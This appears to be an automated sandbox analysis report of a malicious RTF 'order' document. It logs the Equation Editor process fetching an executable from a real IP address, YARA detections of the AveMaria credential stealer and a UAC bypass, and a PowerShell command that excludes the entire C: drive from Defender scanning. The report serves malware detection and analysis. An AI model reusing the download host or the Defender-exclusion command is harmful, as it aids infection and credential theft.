                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\18SEW5FIXHOFFJAE3AYV.temp

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.5834415956890346
                    Encrypted:false
                    SSDEEP:96:chQCYMqRqvsqvJCwonAz8hQCYMqRqvsEHyqvJCwortAzgJKrUHEA6H6JlUVJAjp:c+soAz8+YHnorKzgwM6H6Ljp
                    MD5:6325751516F9AEA8661AEF15A581CBBF
                    SHA1:43C49C89157E43037F2293F86AE9283817607C70
                    SHA-256:EC1C84A2A7CF4D0991039F26B04B819CBBCE3EAD99EFE275C7FB93D4E85670B5
                    SHA-512:5241619762E71A38FA8CFA6BED33AE00325F61FD181F9FB7EE261E2FD2341415CD27E549656E34F027489A06473F99BFF30384BE5DF5EE1E3C73AF60291F77E8
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.5834415956890346
                    Encrypted:false
                    SSDEEP:96:chQCYMqRqvsqvJCwonAz8hQCYMqRqvsEHyqvJCwortAzgJKrUHEA6H6JlUVJAjp:c+soAz8+YHnorKzgwM6H6Ljp
                    MD5:6325751516F9AEA8661AEF15A581CBBF
                    SHA1:43C49C89157E43037F2293F86AE9283817607C70
                    SHA-256:EC1C84A2A7CF4D0991039F26B04B819CBBCE3EAD99EFE275C7FB93D4E85670B5
                    SHA-512:5241619762E71A38FA8CFA6BED33AE00325F61FD181F9FB7EE261E2FD2341415CD27E549656E34F027489A06473F99BFF30384BE5DF5EE1E3C73AF60291F77E8
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                    C:\Users\user\AppData\Roaming\fiftikmernk852317.exe

                    Download File
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2358784
                    Entropy (8bit):2.646635659437136
                    Encrypted:false
                    SSDEEP:6144:5633nN00RiTwSltgxCKYPMXq9NmiQBYGhpX8x4MWy1FYCz8hJ2n3C+8Jk7UBj7A0:5633+D4pa7+o
                    MD5:5AE8471C10CDB2A59B950E66F8CA8A46
                    SHA1:284F5B01A3D7F404DCD9B5346D1A67A9DE0E9C6B
                    SHA-256:2A83A969BE112352798176D1769378C9D3330799051DF12114B1BB8D7EF0BFB5
                    SHA-512:C872B2B93BC0CE74B89DC1F8A54FA4E5356A668FD3C406EE62EB63FEEEF93E03AD59D5B23B841287A2BB0ADEF54699049F3CC7C9CDD7EA2A91253DACBA4E0344
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 58%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[V.n5..n5..n5.^04..n5.^06..n5.^01..n5.^00..n5......n5......n5..n4.}n5.F00..n5.F05..n5.F0...n5..n...n5.F07..n5.Rich.n5.................PE..L...*..b.....................n#.....:.............@..........................P$...........@.....................................,.....!.....................@$..... ...............................@...@...............T............................text............................... ..`.rdata...4.......6..................@..@.data..... ....... .................@....gfids..`.....!......b!.............@..@.tls..........!......d!.............@....rsrc........!......f!.............@..@.reloc.......@$.......#.............@..B................................................................................................................................................................................................................

                    C:\Users\user\Desktop\~$w Order ( MY 01-22-DTHI .doc

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.503835550707525
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                    MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                    SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                    SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                    SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

                    Static File Info

                    General

                    File type:data
                    Entropy (8bit):5.4482786978546205
                    TrID:
                    • Rich Text Format (4004/1) 100.00%
                    File name:New Order ( MY 01-22-DTHI .doc
                    File size:11198
                    MD5:ae55aaa571fd4f87839cb1ebc9706d32
                    SHA1:f7dab7f7f3556fe38a001dba46c9e93d4ffbf32b
                    SHA256:49235a707a23701651de637ce90e530247dcf6877001f416aa459a9bb0a22daa
                    SHA512:1fa3ae6b24226e12919be1b36f92843276801157f2968e891125d3d7ee6aec7ae69e6086adf187fd75ba3cca697c80ad891c6ff697f10107db3dcca10ef8e5e6
                    SSDEEP:192:a6VFXWgf93ef3FZr2aZmnJfiMll+bZXe9uZwVtDvwFiNS+NS6CLcFS6s:a6VFXWgf93et0dJfVll+bZXe9uUFwEAd
                    TLSH:2132077CC04B4AD8CFC962F89A0A7E5550687A6CE3C9B4237A7CB3752796D3E6207434
                    File Content Preview:{\rt?click enable editing to open in readable format'??7!?;|`$]??'.9#344~#[|.|'?~,<3++:.&'^?9?1.?,0*!~<+[72<!(98,?1.'47;;%'$$;+9`?;%~|<:.@@<.-5+^.<4.`?|?|8,??9~#+2+$.+)7?.`5>?1?(?6:^2?'%_7-./_@0`3?2;33-8/^~2.7,?4%][_2-+_.0?!^04,%%?&99?]^-*.<?.*??%];!_?=09

                    File Icon

                    Icon Hash:e4eea2aaa4b4b4a4

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Aug 6, 2022 08:57:45.428165913 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.456696033 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.456790924 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.457700968 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.486179113 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486479998 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486517906 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486566067 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486603022 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486620903 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486633062 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486649036 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486650944 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.486669064 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486670017 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.486706972 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486723900 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.486787081 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.486798048 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.486800909 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.498687983 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.515767097 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.515810013 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.515840054 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.515842915 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.515868902 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.515875101 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.515904903 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.515908003 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.515930891 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.515980005 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516103983 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516175032 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516190052 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516215086 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516252995 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516263008 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516340971 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516379118 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516405106 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516421080 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516453028 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516489029 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516510010 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516557932 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516582012 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516623974 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516700029 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516705036 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516742945 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516784906 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516853094 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516891003 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516912937 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516918898 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516920090 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.516932011 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.516984940 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.517014980 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.517021894 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.517107010 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.517189980 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.543795109 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.543834925 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.543859005 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.543883085 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.543910027 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.543910980 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.543935061 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.543936968 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.543939114 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.543947935 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.543978930 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544006109 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544033051 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544050932 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544055939 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544058084 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544059038 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544087887 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544091940 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544114113 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544122934 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544142008 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544156075 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544158936 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544168949 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544184923 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544195890 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544223070 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544231892 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544234991 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544249058 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544256926 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544275999 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544282913 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544303894 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544331074 CEST8049178208.67.105.179192.168.2.22
                    Aug 6, 2022 08:57:45.544342041 CEST4917880192.168.2.22208.67.105.179
                    Aug 6, 2022 08:57:45.544347048 CEST4917880192.168.2.22208.67.105.179

                    HTTP Request Dependency Graph

                    • 208.67.105.179

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249178208.67.105.17980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    TimestampkBytes transferredDirectionData
                    Aug 6, 2022 08:57:45.457700968 CEST0OUTGET /fifthikmerozx.exe HTTP/1.1
                    Accept: */*
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 208.67.105.179
                    Connection: Keep-Alive
                    Aug 6, 2022 08:57:45.486479998 CEST1INHTTP/1.1 200 OK
                    Date: Sat, 06 Aug 2022 06:57:45 GMT
                    Server: Apache
                    Last-Modified: Thu, 04 Aug 2022 23:59:00 GMT
                    ETag: "23fe00-5e573221f770a"
                    Accept-Ranges: bytes
                    Content-Length: 2358784
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Content-Type: application/octet-stream
                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 0f 5b 56 f3 6e 35 05 f3 6e 35 05 f3 6e 35 05 5e 30 34 04 f1 6e 35 05 5e 30 36 04 f7 6e 35 05 5e 30 31 04 fe 6e 35 05 5e 30 30 04 d5 6e 35 05 fa 16 b6 05 f0 6e 35 05 fa 16 a6 05 e8 6e 35 05 f3 6e 34 05 7d 6e 35 05 46 30 30 04 f0 6e 35 05 46 30 35 04 f2 6e 35 05 46 30 ca 05 f2 6e 35 05 f3 6e a2 05 f2 6e 35 05 46 30 37 04 f2 6e 35 05 52 69 63 68 f3 6e 35 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2a 18 ec 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 8c 00 00 00 6e 23 00 00 00 00 00 3a 8d 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 c6 00 00 a8 00 00 00 88 c7 00 00 2c 01 00 00 00 b0 21 00 d0 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 24 00 00 0d 00 00 20 ad 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c ad 00 00 18 00 00 00 40 ad 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 8a 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 34 00 00 00 a0 00 00 00 36 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a0 20 00 00 e0 00 00 00 9c 20 00 00 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 60 00 00 00 00 90 21 00 00 02 00 00 00 62 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 a0 21 00 00 02 00 00 00 64 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 88 02 00 00 b0 21 00 00 8a 02 00 00 66 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 0d 00 00 00 40 24 00 00 0e 00 00 00 f0 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1b 15 00 00 c6 05 f5 7b 61 00 01 c3 cc cc cc 6a 00 68 7c 6f 61 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[Vn5n5n5^04n5^06n5^01n5^00n5n5n5n4}n5F00n5F05n5F0n5nn5F07n5Richn5PEL*bn#:@P$@,!@$ @@T.text `.rdata46@@.data @.gfids`!b!@@.tls!d!@.rsrc!f!@@.reloc@$#@B{ajh|oa


                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:08:58:13
                    Start date:06/08/2022
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Imagebase:0x13f090000
                    File size:1423704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:2
                    Start time:08:58:14
                    Start date:06/08/2022
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:5
                    Start time:08:58:19
                    Start date:06/08/2022
                    Path:C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
                    Imagebase:0xdd0000
                    File size:2358784 bytes
                    MD5 hash:5AE8471C10CDB2A59B950E66F8CA8A46
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000005.00000002.1180455880.0000000000AEF000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000005.00000002.1180455880.0000000000AEF000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000005.00000003.980168722.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000005.00000003.980168722.00000000004CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000005.00000003.980064261.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000005.00000003.980064261.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 58%, ReversingLabs
                    Reputation:low

                    General

                    Target ID:6
                    Start time:08:58:54
                    Start date:06/08/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:powershell Add-MpPreference -ExclusionPath C:\
                    Imagebase:0x21e10000
                    File size:452608 bytes
                    MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    General

                    Target ID:8
                    Start time:08:58:55
                    Start date:06/08/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\cmd.exe
                    Imagebase:0x4ab90000
                    File size:302592 bytes
                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
